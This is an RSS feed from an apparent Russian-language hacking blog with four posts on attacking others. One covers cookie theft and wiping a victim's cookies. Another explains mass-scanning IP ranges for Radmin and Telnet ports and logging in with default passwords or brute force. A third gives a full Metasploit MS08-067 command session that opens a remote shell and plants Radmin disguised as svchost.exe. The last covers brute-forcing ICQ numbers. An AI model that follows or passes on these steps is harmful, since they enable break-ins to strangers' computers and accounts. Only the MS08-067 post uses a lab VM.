<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Как разблокировать аккаунт &#187; Взлом сайтов и программ</title>
	<atom:link href="http://suspended.ru/category/%d0%ba%d0%b0%d0%ba-%d0%b2%d0%b7%d0%bb%d0%be%d0%bc%d0%b0%d1%82%d1%8c/feed/" rel="self" type="application/rss+xml" />
	<link>http://suspended.ru</link>
	<description>Как разблокировать аккаунты, защитить компьютер и стать хакером</description>
	<lastBuildDate>Thu, 23 Dec 2021 13:52:45 +0000</lastBuildDate>
	<language>ru-RU</language>
		<sy:updatePeriod>hourly</sy:updatePeriod>
		<sy:updateFrequency>1</sy:updateFrequency>
	<generator>https://wordpress.org/?v=3.9.27</generator>
	<item>
		<title>Взлом через cookie</title>
		<link>http://suspended.ru/2010/07/%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-%d1%87%d0%b5%d1%80%d0%b5%d0%b7-cookie/</link>
		<comments>http://suspended.ru/2010/07/%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-%d1%87%d0%b5%d1%80%d0%b5%d0%b7-cookie/#comments</comments>
		<pubDate>Tue, 13 Jul 2010 05:04:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Взлом сайтов и программ]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароль]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=416</guid>
		<description><![CDATA[конецформыначалоформыЗачем Cookie нужен? Дело в том, что HTTP-протокол &#8212; одноразовый, если так можно выразиться. Т.е. каждый раз заходя на страничку, пользователь начинает сначала, что бы он не вводил, и какие изменения бы не делал. Cookie помогает создать иллюзию, что пользователя помнят на сайте. Пользователю не нужно вводить сотню раз одну и ту же информацию от [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet116.jpg" alt="интернет" />конецформыначалоформыЗачем Cookie нужен? Дело в том, что HTTP-протокол &#8212; одноразовый, если так можно выразиться. Т.е. каждый раз заходя на страничку, пользователь начинает сначала, что бы он не вводил, и какие изменения бы не делал. Cookie помогает создать иллюзию, что пользователя помнят на сайте. Пользователю не нужно вводить сотню раз одну и ту же информацию от странички к страничке, и даже от сессии к сессии, она хранится у него на диске. К удобству можно отнести еще и то, что эту информацию пользователь всегда сможет сменить у себя на диске &#171;на лету&#187;. В Cookie также могут храниться другие разнообразные данные. Например, количество посещений какой-то страницы, время посещений. С помощью cookie не составляет труда сделать маленький органайзер или корзину в виртуальном магазине.<span id="more-416"></span><br />
Cookie многие не любят из-за ее небезопасности. Многие аналитики говорят, что это не проблема, и ничего плохого с помощью данной технологии сделать нельзя. Я с этим глубоко не согласен, если кто-то может читать информацию из файла(ов) cookie, то это уже небезопасно. Приведу чисто теоретические примеры, которые, при желании, не трудно воплотить в реальность.<br />
1. Допустим, пользователь зашел на почтовый сайт, заполнил форму с login&#8217;ом и паролем, которые записались в cookie, пускай даже через Secure Socket Level. Взломщик написал письмо пользователю в формате HTML с параметрами чтения cookie с паролями. Прочитав cookie, HTML-файл или запрашивает у пользователя разрешение отослать информацию взломщику, где пользователя можно обмануть ложной надписью а ля &#171;Ошибки в сценариях Javascript!&#187;. Даже довольно опытный пользователь не задумываясь нажмет OK, после чего login и пароль отошлется взломщику. Или взломщик может добавить 0-ой фрейм, где будет временно содержаться информация из cookie, которая при ответе на письмо, будет вставляться в конец письма. Все это нетрудно сделать с помощью FORM и Javascript.<br />
2. Пример с виртуальным магазином. Допустим, мы имеем гипотетический магазин shop.provider.com. Совершая покупки в данном магазине, пользователь хранит информацию в cookie. Параллельно или до захода в магазин, пользователь зашел на гипотетическую страницу взломщика hacker.provider.com, где изменялись настройки cookie виртуального магазина. Взломщик может изменить количество покупок, имя, адрес, и все то, что хранится в данном cookie. Я думаю, вам бы не понравилось, если к вашим покупкам прибавили пару мониторов или отвезли ваши покупки не тому пользователю. Сделать это довольно просто, если иметь страничку в домене магазина второго или третьего уровня. Несколько других, уже ПРАКТИЧЕСКИХ примеров.<br />
Итак, для пользователя технология cookie представляет собой несколько файлов в папке %WINDOWS%\Cookies (по умолчанию в Internet Explorer), либо всего один файл cookie.txt (если это Netscape Navigator и другие броузеры). Сайты периодически добавляют информацию в cookie и ее же забирают. Естественно, в спецификациях Cookie предусмотрены некоторые элементы защиты.<br />
Всего Cookies может быть не больше 300.<br />
Каждый Cookie не может быть больше 4kb.<br />
С одного домена второго уровня (плюс подуровни) не может быть получено больше 20 Cookies.<br />
Информация из Cookie одного домена второго уровня (плюс подуровни) не может быть прочитана другими доменами.<br />
Если документ кэшируется, то информация о cookie не кэшируется.<br />
Информация в\из Cookie может передавать с помощью протокола SSL. Если лимит исчерпывается, первые записи удаляются. Если Cookie становится больше 4kb, первые байты вырезаются.<br />
Формат Cookie. Полную спецификацию на английском можно найти на http://www.netscape.com/newsref/std/cookie_spec.html. В моей статье только сокращенное описание. Информация в Cookie задается принципом ИМЯ=ЗНАЧЕНИЕ. В одном документе может содержаться несколько Cookies (не больше 20). Минимальное описание поля Cookie выглядит так:<br />
Set-Cookie: NAME=VALUE; Максимальное выглядит так: Set-Cookie: NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME; secure<br />
NAME=VALUE &#8212; NAME &#8212; Имя Cookie, VALUE &#8212; Значение. Можно менять как NAME, так и VALUE. Используются любые символы, кроме символа переноса строки, двоеточия, запятой и пробела. Пример: Имя=Вася<br />
expires=DATE &#8212; Дата окончания действия Cookie. Менять только DATE. Вид такой: &#171;expires=День, Число-Ден-ГГГГ ЧЧ:ММ:СС GMT&#187;. Если expires не обозначен, Cookie хранится до закрытия окна броузера. Пример: expires=Fri, 14-Sep-2005 13:13:13 GMT<br />
domain=DOMAIN_NAME &#8212; домен на котором действителен Cookie. Вид такой: &#171;domain=domain.com&#187;. Cookie будет действителен как для www.domain.com, так и для myname.domain.com. В зоне RU и других локальных зонах не работает. Используется только для COM, EDU, NET, ORG, GOV, MIL и INT. Если domain не обозначен, используется доменное имя сервера с Cookie. Пример1: domain=mamapapa.com Пример2: domain=gazzzeta.da.ru<br />
path=PATH &#8212; Указывает имена докментов, для которых действительно значение Cookie. Вид такой: &#171;path=/word&#187;. Cookie будет отсылаться в директориях /word, /word2000 и файлов в текущей директории с именами word.htm, wordchampion.html. Для применения Cookie ко всему серверу указывается корневой каталог сервера /. Если path не указан, Cookie распространяется только на текущую директорию. Пример1: path=/gazzzeta Пример2: path=/<br />
secure &#8212; Если указан, при передаче Cookie используется HTTPS (HTTP с SSL &#8212; Secure Socket Level). Если secure не указан, Cookie передается HTTP.<br />
Если Cookie использует одинаковое значение NAME, domain и path &#8212; старое значение заменяется новым.<br />
Вставка Cookie в HTML. Вставить Cookie можно несколькими способами. Самые простой &#8212; это через META-тег. Альтернативным способом является Javascript и всевозможные другие технологии (CGI, PHP, SSI и т.д.). Рассматривать CGI, PHP, SSI и прочие мы не будем, т.к. это требует от вашего домена, где располагается страница, возможности использования этих технологий, что бывает не всегда.<br />
Использование Cookie через META-тег. Между тегов и Cookie вписывается так: Можно использовать несколь META-тегов с Cookie в одном документе. Пример:<br />
Использование Cookie через Javascript. Использование Cookie с помощью Javascript является самым популярным способом, т.к. это довольно просто для разработчика, не требует от сервера определенного программного обеспечения и может использовать динамичные данные, генерируемые внутренним Javasript-скриптом, либо вводимые пользователем. Вот примера скрипта Javascript, используещего Cookie. Скрипт не мой, но он точно описывает те возможности, о которых мы говорим. К сожалению, автора скрипта я не знаю поэтому указать не могу.<br />
Останавливаться на данном скрипте смысла нет, статья о Cookie, а не о Javascript.<br />
Как видите, технология Cookie предоставляет огромные возможности для разработчиков сайтов. Cookie поддерживается всеми более или менее известными броузерами, такими как Netscape Navigator, Microsoft Internet Explorer, Mosaic, Opera и другими, начиная с самых первых версий.<br />
Взлом через Cookie<br />
А зачем мне все это надо? Технология cookie используется при заполнении полей, хранения информации, для виртуальных корзин в Интернет-магазинах, в баннерных сетях и много чего еще. Но также эта технология используется взломщиками для достижения своих целей. 1. Радость от гадости. Первый пример основан на том, что по спецификациям, броузер может хранить не больше 20 записей от одного домена. При переполнении данного лимита, старые записи затираются новыми.<br />
Использование: Закачать HTML-файл на тот сервер, откуда пришли cookie. Можно послать по E-mail, если жертва читает почту через Web, все cookie от его почтового сервера сотрутся. Если нужно удалить все cookies с *.домен.com, заменять строчки примера на Работает только с доменами COM, EDU, NET, ORG, GOV, MIL, INT. Сам пример файла:<br />
&#8230;<br />
Сохраняй этот файл как cook.htm, он нам еще пригодится.<br />
2. Полная гадость. Вторая гадость основана на том, что общее количество cookies может быть не больше 300. При переполнении лимита, старые записи также затираются новыми. Уловил мысль? Затираем все cookies жертвы. Сначала тебе придется завести 15 аккаунтов для страничек на разных серверах. Заходим на всякие narod.ru, заводим аккаунты cook.site1.ru, cook.site2.ru и т.д. до cook.site15.ru. Затем заливаем на каждую страничку файл cook.htm, который мы использовали в прошлой гадости. На все это у тебя должно уйти не больше часа при нормальной раскладке пальцев \m/. Создаем файлик index.html и вписываем туда следующее:<br />
Заливаем созданный файл в любое место, например на cook.narod.ru. Зайдя на этот сайт, у пользователя будет вычищаться весь cookies, накопленный годами, за пару секунд.<br />
3. Почему нельзя забить дисковое пространство или сделать buffer overflow? Дело в том, что каждый cookie не может быть больше 4kb. Если лимит превышен, начало cookie удаляется. Максимум, что можно сделать &#8212; забить жертве 1,2mb дискового пространства при хорошем качестве связи у жертвы, либо disconnect&#8217;ить жертву при плохой связи. Для этого меняй строчки в cook.htm на следующее:<br />
Защита. Способов защиты несколько и каждый способ довольно неудобен.<br />
1. Отменить использование cookie в броузере. Недостаток в том, что пользователь фактически отказывается ходить на огромное количество сайтов.<br />
2. Завести программу из класса Cookie Manager. Недостаток в том, что надо постоянно держать лишнюю программу. А это для интернетчика с включенным Firewall&#8217;ом, антивирусным монитором, ICQ, Dialer&#8217;ом и т.д. довольно большое неудобство.<br />
3. Не вступать в случайные связи. Недостаток в том, что твои &#171;проверенные&#187; друзья тоже могут над тобой подшутить, да и не вступать в случайные связи &#8212; значит сидеть дома и наслаждаться сайтами по адресу 127.0.0.1.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/07/%d0%b2%d0%b7%d0%bb%d0%be%d0%bc-%d1%87%d0%b5%d1%80%d0%b5%d0%b7-cookie/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>2 идеальных метода взлома</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-130/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-130/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:04:41 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Взлом сайтов и программ]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароль]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=430</guid>
		<description><![CDATA[конецформыначалоформыХай народ!Вот снова я добрался до Word-а и пишу статью о том какими методами можно пользоваться чтоб проникнуть в чужой комп,а точнее какими способами пользуюсь я,может кому пригодиться этот способ.Много вопросов я видел о том как взломать комп,и ответов хороших тоже много,но захотелось мне выложить одну такую статейку и на хакзоне.Сейчас я опишу наиболие популярные [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet130.jpg" alt="интернет" />конецформыначалоформыХай народ!Вот снова я добрался до Word-а и пишу статью о том какими методами можно пользоваться чтоб проникнуть в чужой комп,а точнее какими способами пользуюсь я,может кому пригодиться этот способ.Много вопросов я видел о том как взломать комп,и ответов хороших тоже много,но захотелось мне выложить одну такую статейку и на хакзоне.Сейчас я опишу наиболие популярные способы по проникновению на чужой комп,один из них я видел тут на хакзоне,но об этом я описал ниже.И так давайте начьнём.<br />
Что же нам понадобиться для дальнееших действий?Нам будет необходимо:<br />
-Сканер портов (Или сканер безопасности)<br />
-Телнет клиент (Он входит в стандартную комплектацию Windows-a)<br />
-Radmin viewer (Это тоже прога для удалённого администрирования,подробней ниже)<br />
Это всё самое необходимое.<span id="more-430"></span>И так,для того чтоб хакнуть чужой комп я чаще всего пользуюсь такими методами:<br />
-Через порт радмина (4899 порт)<br />
-Телнет порт (23 порт)<br />
Вот такими способоми я чаще всего ломаю компы.А теперь давайте рассмотрим каждый из них.<br />
Начнём с радмина:<br />
РАДМИН (Radmin):<br />
Тут на хакзоне я видел видео по проникновению на чужой комп используя радмин,автор этого видео FIXER,но всё таки я опишу этот хитрый и простой способ ещё раз,так как этот способ входит в мою статью,и может кто не смотрел видео.<br />
Радмин,порт которого 4899,используеться для удалённого администрирования,для того чтоб открыть порт радмина,на компе должен быть установлен и запущен сервер радмина.Мы сейчас и будем искать жертв с открытым 4899 портом.<br />
Я для этого буду использовать сканер уязвимостей XSpider.<br />
Запускаем XSpider,и создаём новый профиль (Профиль-Новый):<br />
-В появившимся окне,начнём давайте с нижней вкладки,переходим к вкладке &#171;NetBIOS&#187;,снимаем все галочки,переходим к следующей,Telnet,от туда тоже снимаем галочки,переходим к следующий,SQL,и от туда убираем галки,и так идя с низу вверх,убираем галки со всех вкладок (всеголишь снимаем галки,и не меняем никакие параметры) когда дошли до вкладки &#171;Сканер Портов&#187;,останавлеваемся на этой вкладке,и видим там надпись в низу окна:<br />
Файл портов: default.prf<br />
Жмём на кнопку которая справо этой надписи,в появившимся окне жмём в верху на запись &#171;Новый&#187;,в ещё одном появившемся окошке жмём кнопку &#171;Выбрать&#187;,В появившемся окне,в поле &#171;Коментарий&#187; давайте впишем 4899.В нижнее поле в том же окне с названием &#171;Добавить прт[ы]:&#187;<br />
Вписываем 4899,этим мы указываем порт,жмём добавить,затем нажимаем на &#171;Сохранить как&#8230;&#187;,В поле &#171;Имя файла&#187; вписываем 4899,и жмём &#171;Сохранить&#187;.Далее в появившемся списке профилев выбираем наш созданный &#171;4899&#8243; и жмём &#171;Выбрать&#187;.Далее в оставшемся окне насройки профиля,переходим к вкладке NetBIOS,и жмём там &#171;Сохранить как&#8230;&#187;,пишим в поле &#171;имя файла&#187; 4899 и жмём &#171;Сохранить&#187;.<br />
Уффф&#8230;,после долгих мучений на этом настройка профиля окончена,ПРОФИЛЬ СОЗДАН!Теперь выбираем наш профиль,(Профиль-Применить Существующий) кликаем по нему один раз,и жмём выбрать.<br />
Теперь когда профиль создан и выбран,нужно просканить определённый диапазон IP адресов,(помните что максимальный это 255.255.255.255) ВЫ щас думайте,а какой ваще диапазон сканить надо?Да любой,хоть вдоль и поперёк.Я выбрад себе один диапазон,и буду сканить от 79.126.27.0 до 79.126.27.255<br />
Жмём в Спайдере &#171;Добавить диапазон&#187;,вписываем нужный,и жмём ОК,когда спайдер найдёт все компы в этом диапазоне,начинайте сканировать.Ну вто допустим мы начали сканить диапазон<br />
79.126.27.0 &#8212; 79.126.27.255.<br />
Когда спайдер находит жертву с открытым 4899 портом тот айпи выделяеться зелённым цветом.Это и будет комп с 4899 портом.Ну вот просканив этот диапазон я один раз нашел уязвимый комп,это 19.126.27.202.<br />
Теперь берём прогу Radmin Viewer (Не спутайте с Radmin Server!!),запускаем,вписываем туда найденный IP жертвы с открытым 4899 портом,выбераем режим подключения,для удобства выберайте &#171;File-transfer&#187;,и подключаемся,Если версия сервера радмина установленная на компе жертвы ниже 2.2,то попросит только пароль,пробуем пасс по дефолту,по дефолту он всегда стоит 12345678,если не подошел,то тогда придёться использовать брутер,но чаще всего стоит по дефолту.Для радмина брутэра нету,но один чел его написал,и он у меня есть,если кому надо,то стучите в асю,скину брутер.<br />
Ну вот,допустим пароль подошел,и после этого мы попадаем в комп к жертве,и творим чё хотим))Чё творить это уже ваше дело)).Вот таким простым способом мы получили доступ к удалённому компу.<br />
Тепеь давайте рассмотрим взлом через телнет.<br />
TELNET<br />
Искать компы с открытым 23 портом телнетом можно также как я описывал во взломе с радмином,только при настройке профиля,указываем 23 порт а не 4899 порт.И всё,всё также,только мы указали 23 порт.Пасс по дефолту стоит или 1234 или 12345.Если не подошел то пробуй те как я и говорил брутфорс.Подойдёт BrutusAET2.<br />
Я тут описал только самый простой способ искать телнет порты и взламывать,может кто то использует и другой,но я описал как этим пользуюсь я.<br />
Ну вот,эти 2 метода которыми я пользуюсь чтоб хакнуть комп.<br />
Ну а если надо взломать комп знакомого или друга,то тогда пользуюсь трояном.Как это делать описывать не буду потомучто на хакзоне этого много.<br />
На этом пока всё,в следующей статье опишу как взломать через шары (Shared Resources),Но это потом.)<br />
Ну,спасибо за внимания,с вами был redbu11.Желаю всем успехов со взломом!Пока!)))</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-130/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Взлом ПК , под управлением Windows</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-129/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-129/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:04:41 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Взлом сайтов и программ]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароль]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=429</guid>
		<description><![CDATA[конецформыначалоформыАтаки на протокол Атаки на ПО Атаки на пользователя Необходимый софт: Любой дистрибьютив Windows XP (SP2,SP3 ) Виртуальная машина Vmware. Итак, нам нужно где-то законно, развивать свои навыки, для этого создадим виртуальную машину и установим на нее так любимый пользователями Windows, надеюсь все уже скачали виртуальную машину Vmware, устанавливаем и открываем. Создаем новую машину в [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet129.jpg" alt="интернет" />конецформыначалоформыАтаки на протокол<br />
Атаки на ПО<br />
Атаки на пользователя<br />
Необходимый софт:<br />
Любой дистрибьютив Windows XP (SP2,SP3 )<br />
Виртуальная машина Vmware.<br />
Итак, нам нужно где-то законно, развивать свои навыки, для этого создадим виртуальную машину и установим на нее так любимый пользователями Windows, надеюсь все уже скачали виртуальную машину Vmware, устанавливаем и открываем.<br />
Создаем новую машину в Vmware, для этого зажимаем CTRL+N, и следум инструкциям, там все интуитивно понятно. Теперь идем в Edit => Virtual Network Setting и переходим на вкладку Host Virtual Adapter</p>
<p>http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_sPqVgrSI/AAAAAAAAABU/mbkjmgkOPZw/s1600-h/4.JPG</p>
<p>Нажимаем add и создаем нужное количество виртуальных адаптеров.<span id="more-429"></span> Затем идем в DHCP и удаляем от туда все адаптеры кроме, Wmnet1 и Wmnet8. Тут можно нажать Принять и ОК, или же сходить в Host Virtual Network Mapping и настроить каждому</p>
<p>http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_sYkHlZUI/AAAAAAAAABc/qjfM2pZ377g/s320/6.JPG</p>
<p>адаптеру свой ip, если этого не сделать, то они будут назначенны автоматически.<br />
Заходим в настройки виртуальной манины CTR+D, переходим на вкладку Enternet, выбираем Custop Specifnc: virtual network и назначаем любой понравившейся интерфейс, конечно, кроме Wmnet1 и Wmnet8, я выбрал Vmnet2.</p>
<p>http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tAviI_NI/AAAAAAAAABk/9KgaPlft3Vg/s320/7.JPG</p>
<p>Теперь переходим к CD-ROM, ставим галочку на Use ISO image, жмем обзор и выбираем образ с которого будем устанавливать Windows, мы также можем установить его с диска отметив Use physical drive, и выбрав соответствующий привод.</p>
<p>http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_tPG8Z0HI/AAAAAAAAABs/VhLjeTEXL3U/s320/8.JPG</p>
<p>Ну вот приготовления закончены теперь запускаем виртуальную машину и жмем F12, если вы все правильно сконфигурировали, то перед вами появится окно установки. В моем случае оно выглядит так, у вас может отличатся, завит от уставливаемой ОС. Я использовал сборку ZVERDVD.</p>
<p>http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tbjgIAiI/AAAAAAAAAB0/lDyNMxBWq5g/s320/9.JPG</p>
<p>Необходимый софт:<br />
ФТП — сервер (Serv -U)<br />
Значит, после установки необходимо настроить сеть, между нашим реальным ПК и Виртуальным. Для этого идем в свойства подключения виртуального адаптера, который вы выбрали на вкладке Enternet у меня это Vmnet2.</p>
<p>http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_t-0smY_I/AAAAAAAAAB8/gfPFPI4pUD8/s400/11.JPG</p>
<p>IP адресс 192.168.1.3<br />
Маска подсети 255.255.255.0<br />
Теперь загружаем виртуальную машину и также идем в сетевые подключения и смотрим свойства tcp/ip.</p>
<p>http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_uM38r_JI/AAAAAAAAACE/1rMp4pVRuhc/s400/10.JPG</p>
<p>Настраиваем следующим образом:<br />
IP адресс 192.168.1.10<br />
Маска подсети 255.255.255.0<br />
Основной шлюз 192.168.1.3<br />
Осталось только поставить ФТП сервер на наш реальный ПК. Я выбрал Serv -U, он заводится с пол аборота. Важно, когда будете создавать пользователя, создавайте без пароля, да и вешайте фтп на стандартный 21 порт, используемый протокол тоже ФТП.</p>
<p>http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_ueYAqsjI/AAAAAAAAACM/nM1W9kgxHBY/s400/12.JPG</p>
<p>#ПРИМЕР.#<br />
Необходимый софт:<br />
Metasploit 3.2<br />
Radmin Viewer 3<br />
RadminServer (спец. Сборка)<br />
Сканим комп xspider&#8217;ом</p>
<p>http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_5nXMqGLI/AAAAAAAAACs/TZRNc3_wzlA/s400/16.JPG</p>
<p>Для взлома мы бужем использовать, недавно обнаруженную уязвимость в службе Server(ms08_067).Запускаем Metasploit 3 Web, ждем пока загрузится и затем в адресной строке браузера пишем 127.0.0.1:55555.</p>
<p>http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_uwjg_pzI/AAAAAAAAACU/r3l9-k44ksE/s400/13.JPG</p>
<p>use windows/smb/ms08_067_netapi ; наш сплоит<br />
set PAYLOAD generic/shell_bind_tcp ; выбираем начинку<br />
PAYLOAD => generic/shell_bind_tcp<br />
set RHOST 192.168.1.10 ; хост-жертва<br />
RHOST => 192.168.1.10<br />
set LPORT 7777 ; локальный порт<br />
LPORT => 7777<br />
set RPORT 445 ; удаленный порт<br />
RPORT => 445<br />
exploit<br />
[*] Started bind handler<br />
[*] Automatically detecting the target&#8230;<br />
[*] Fingerprint: Windows XP Service Pack 3 &#8212; lang:Russian<br />
[*] Selected Target: Windows XP SP3 Russian (NX)<br />
[*] Triggering the vulnerability&#8230;<br />
[*] Command shell session 1 opened (192.168.1.3:5583 -> 192.168.1.10:7777)<br />
Microsoft Windows XP [‚?aa?i 5.1.2600]<br />
(‘) S®a?®a ??i ? ©?a®a®aa, 1985-2001.<br />
C:WINDOWSsystem32><br />
Получили командную строку на удаленной системе<br />
{создаем в папке windows, папку helps}<br />
cd c:windows<br />
mkdir helps<br />
{коннектимся к нашему компу}<br />
ftp192.168.1.3<br />
Пользователь (192.168.1.3:(none)): kerny<br />
{успешный коннект, идем c:kerny нашего фтп, именно там хранится радмин}<br />
cd c:kerny<br />
dir<br />
{файлы радмина}<br />
drw-rw-rw- 1 user group 0 Mar 2 20:10 .<br />
drw-rw-rw- 1 user group 0 Mar 2 20:10 ..<br />
-rw-rw-rw- 1 user group 547 Mar 2 20:10 111.bat<br />
-rw-rw-rw- 1 user group 940 Mar 2 20:10 111.reg<br />
-rw-rw-rw- 1 user group 40448 Mar 2 20:10 AdmDll.dll<br />
-rw-rw-rw- 1 user group 17408 Mar 2 20:10 raddrv.dll<br />
-rw-rw-rw- 1 user group 152576 Mar 2 20:10 svchost.exe<br />
{сливаем файлы на комп жертвы в папку windowshelps}<br />
get 111.bat c:windowshelps111.bat<br />
get 111.reg c:windowshelps111.reg<br />
get AdmDll.dll c:windowshelpsAdmDll.dll<br />
get raddrv.dll c:windowshelpsraddrv.dll<br />
get svchost.exe c:windowshelpssvchost.exe<br />
{отключаемся от нашего фтп}<br />
bye<br />
{идем в папку, и проверяем скачались ли файлы}<br />
cd c:windowshelps<br />
dir<br />
-rw-rw-rw- 1 user group 547 Mar 2 20:11 111.bat<br />
-rw-rw-rw- 1 user group 940 Mar 2 20:11 111.reg<br />
-rw-rw-rw- 1 user group 40448 Mar 2 20:12 AdmDll.dll<br />
-rw-rw-rw- 1 user group 17408 Mar 2 20:12 raddrv.dll<br />
-rw-rw-rw- 1 user group 152576 Mar 2 20:12 svchost.exe<br />
{устанавливаем Radmin у жертвы}<br />
111.bat</p>
<p>http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_weqnkS1I/AAAAAAAAACc/de-qr4zW1Xo/s400/14.JPG</p>
<p>Теперь запускаем Radmin Viewer и конектимся, как видим все прошло успешно.</p>
<p>http://2.bp.blogspot.com/_oxXdxKIGwp0/Sa_wqRwzH3I/AAAAAAAAACk/A7Xi7UIkWaE/s400/15.JPG</p>
<p>Снял видео, там же и статья отформатированная в pdf:</p>
<p>http://ifolder.ru/10884195</p>
<p>http://kerny-auroras.blogspot.com/2009/03/windows.html</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-129/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Ломаем ICQ</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-128/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-128/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:04:41 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Взлом сайтов и программ]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароль]]></category>
		<category><![CDATA[хакер]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=428</guid>
		<description><![CDATA[Итак, нам надо сломать аську. Ломать будем с проги IPDBrute2 SE : Скачать можно здесь: http://seq.clan.su/ipdbrutesepro2.rar Сначала определимся что конкретно хочется &#8212; надыбать себе Х-знак или снять ИМЕННОЭТОТ номер. От этого пойдут дальнейшие действия. Если хочется взять себе Х-знак : Тогда качаем какой-нибудь склейщик паролей-уинов ,например &#8212; UINGen Swift&#8217;a &#8212; Скачиваем тут: http://seq.clan.su/Generator.rar *можно написать [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet128.jpg" alt="интернет" />Итак, нам надо сломать аську. Ломать будем с проги IPDBrute2 SE :<br />
Скачать можно здесь: http://seq.clan.su/ipdbrutesepro2.rar<br />
Сначала определимся что конкретно хочется &#8212; надыбать себе Х-знак или снять ИМЕННОЭТОТ номер. От этого пойдут дальнейшие действия.<br />
Если хочется взять себе Х-знак :<br />
Тогда качаем какой-нибудь склейщик паролей-уинов ,например &#8212; UINGen Swift&#8217;a &#8212; Скачиваем тут: http://seq.clan.su/Generator.rar<br />
*можно написать свою)* и выполняем следующие действия:<br />
1) допустим, что мы ловим шестизнак. Тогда пишем себе тектовик LAMERGOOD.TXT, в нем кидаем по паролю на строчку:<br />
LAMERGOOD.TXT<br />
123456<br />
qwerty<br />
mypass<br />
password<br />
Это &#8212; пароли, что будут подбираться под шестизнак.<span id="more-428"></span><br />
2)Открываем UINGen, в нем берем диапозон 100000-999999, щелкаем по радио-инпуту Словарь:, в словарь указываем путь к нашему LAMERGOOD.TXT. разделитель выбираем точку с запятой &#8212; &#171;;&#187;. *БЕЗ кавычек!*.<br />
Если хочется взять именно ЭТОТ номер :<br />
Качаем множество словарей&#8230; Откуда? www.google.ru )) Словари для брутабрутфорса. Сразу очень много чего выдает. Мб внизу припишу таки список откуда качать.<br />
